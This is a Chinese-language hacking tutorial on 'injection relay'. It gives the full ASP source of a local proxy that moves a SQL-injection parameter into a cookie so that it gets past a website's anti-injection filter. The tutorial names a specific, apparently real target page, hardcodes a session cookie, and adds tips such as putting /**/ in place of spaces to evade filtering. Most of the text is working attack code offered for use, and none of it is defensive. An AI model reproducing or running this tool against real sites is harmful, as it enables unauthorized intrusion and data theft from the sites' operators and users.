注入中转的基本方法

注入时如果发现有防注,可以试试
红色部分是需要修改的
假如http://www.fanzhiduxm.com/news.asp?Aid=195发现防注
那么就改为下面内容,使用时本地搭一个ASP环境即可
再用这一行代码进行注入
http://127.0.0.1/proxy.asp?jmdcw=11

<%
JmdcwName=request("jmdcw")
' 注入中转站 COOKIE 版,BY 7DaTA
JmdcwName=escape(JmdcwName)
JmStr="Aid="&JmdcwName
JMUrl="http://www.fanzhiduxm.com/news.asp"
JmRef="http://www.fanzhiduxm.com/news.asp"
JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ;"
JmCok=JmCok & ";" & Jmstr &";"
JmCok=URLEncoding(JmCok)
JmStr="jmdcw=11"
response.write PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http

.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function URLEncoding(vstrin)
strReturn=""
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加转换+字符
'strReturn=Replace(strReturn,过滤字符,"转换为字符") '在此增加要过滤的代码
URLEncoding=strReturn
End Function

%>